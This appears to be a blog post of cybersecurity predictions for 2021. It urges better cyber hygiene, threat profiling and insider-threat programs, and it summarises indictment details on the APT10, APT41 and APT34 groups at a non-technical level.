It seems everyone is making predictions for 2021. If we learned nothing else from 2020, it is that “The best-laid schemes of Mice and Men Often go awry, and leave us nothing but grief and pain, for promised joy” (Burns, Robert, 1785). Nevertheless, I will throw my two cents in the mix.
For 2021 I see our cybersecurity challenges giving us four very distinct challenge areas: Cybersecurity Hygiene, Threat profiling and tuning, Insider Threat, and Advanced Persistent Threat (APT) activities. There will be an uptick and increasingly brazen attack pattern from various APTs around the world. Keeping up on our Cybersecurity hygiene will be paramount in our success in thwarting these onslaughts. Threat Profiling will prioritize the attacks for which we may most likely need to defend. We will require more visibility on insider activity and risk scoring to understand where information exposure may be (or becoming) at risk. And lastly, we must know our enemy and know where they strike, why, and how. As critical infrastructure upgrades the Operational Technology (OT) environments, it will open these up to more common IT-based attacks that may complicate the security of these (increasingly) connected environments.
As most security professionals know, a large percentage of the nefarious events are “crimes of opportunity.” Access doors left open, S3 buckets mismanaged, application developers not accounting for proper IAM in the apps, etc. We should give special attention to strengthening our programs on IAM provisioning and de-provisioning, shoring up and strengthening our testing and change control process, and streamlining our processes that close the gap from “detection to remediation” in our vulnerability management programs. These process improvements coupled with the standard tool deployments of SEIM, NextGen AV, EDR, Rogue WAP prevention, and properly configured, maintained, and deployed firewall solutions will help defend against our mounting threat for this coming year. Oh, and, no matter your development lifecycle, implement an AppDevSec program now, not later, but now.
The focus on our excellent cyber hygiene at home brings us to looking at a shifting landscape in the global APT threats. According to the latest analysis, these groups will (and have) stepped up their “brazen” attack attempts on their target audiences. Not without, however, notable intelligence on their “calling card” Indications of Compromise (IoC)
This Chinese group (also known as Red Apollo) seems to infiltrate “supplier” networks to either disrupt the supply chain, steal intellectual property for the Chinese Government, or leverage the supplier to dive deeper into the government or customer’s systems. Paraphrased from their FBI “wanted poster,” – APT 10 conducted extensive campaigns of global intrusions into computer systems aiming to steal, among other data, intellectual property and confidential business and technological information from more than at least 45 commercial and defense technology companies in at least a dozen states, managed service providers (“MSP”), which are companies that remotely manage the information technology infrastructure of businesses and governments around the world, and U.S. government agencies. The victim companies targeted by ZHU HUA and ZHANG SHILONG were involved in a diverse array of commercial activity, industries, and technologies, including aviation, space and satellite technology, manufacturing technology, oil and gas exploration, production technology, communications technology, computer processor technology, and maritime technology. In addition, for example, the APT 10 Group’s campaign compromised the data of an MSP and certain of its clients located in at least 12 countries, including Brazil, Canada, Finland, France, Germany, India, Japan, Sweden, Switzerland, the United Arab Emirates, the United Kingdom, and the United States.
This Chinese group (also known as Double Dragon) is transitioning from outright attacks to “hacking for hire” or “Criminal as a Service – CaaS.” Paraphrased from their FBI “wanted poster” – They face D.C. Grand Jury charges, including Unauthorized Access to Protected Computers, Aggravated Identity Theft, Money Laundering, and Wire Fraud. These charges primarily stemmed from alleged activity targeting high technology and video gaming companies and a United Kingdom citizen.
On August 11, 2020, a Grand Jury in the District of Columbia returned an indictment against Chinese nationals QIAN Chuan, FU Qiang, and JIANG Lizhi on charges including Racketeering, Money Laundering, Fraud, Identity Theft, and Access Device Fraud.
These charges stem from their alleged unauthorized computer intrusions while employed by Chengdu 404 Network Technology Company. The defendants allegedly conducted supply chain attacks to gain unauthorized access to networks throughout the world, targeting hundreds of companies representing a broad array of industries: social media, telecommunications, government, defense, education, and manufacturing. These victims included companies in Australia, Brazil, Germany, India, Japan, and Sweden. The defendants allegedly targeted telecommunications providers in the United States, Australia, China (Tibet), Chile, India, Indonesia, Malaysia, Pakistan, Singapore, South Korea, Taiwan, and Thailand. The defendants allegedly deployed ransomware attacks and demanded payments from victims. APT41 is now taking orders for your desired level of “Christmas Chaos” ahead of the holidays. Okay, that was an editorial comment meant as a joke – but often, jokes are founded in truth.
This Iranian group (also known as Helix Kitten) targets similar entities as their sister team APT33 (also known as Elfin Team or Refined Kitten). APT33 reportedly targeted aerospace, defense, and petrochemical industry targets in the United States, South Korea, and Saudi Arabia. APT34 seems to take on a societal disruption focus, looking at organizations in the financial, energy, telecommunications, chemical industries, and critical infrastructure systems. They leverage “not so creative” methods to infiltrate their targets. They use things like Microsoft Excel macros, PowerShell-based exploits, and social engineering to gain access. This use of IT born attack vectors exacerbate the security challenges. The shift in OT within our critical infrastructure to more common IT components and networking will open the door to more common security exploits and challenges.
This focus on critical infrastructure seems concerning to me. In 2002, I was privileged enough to be invited to participate in the “Digital Pearl Harbor” study at the Naval War College. The findings from the study were “downplayed” and “watered down” to not cause too much public concern, so shortly after 9/11, the results of the scenario testing, to most of the 90 or so participants, was nothing short of terrifying. I live by a theory that “surprise attack planning,” hard dates and target parameters notwithstanding, have flexibility in the project timeline.
So, my predictions are not all gloom and doom. My actual message for my prediction is that we now have an exciting opportunity to look closely and critically at ourselves. We need to evaluate our cyber hygiene, Threat profiling, our insider threat program (to include necessary operational checks and balances), and flesh out and drive our APT mitigation strategy and playbooks. “Knowledge is power” (Bacon, Francis, 1597). The more we know about ourselves, our defenses, our gaps, and our advisories, the more effectively we may spread our security budget.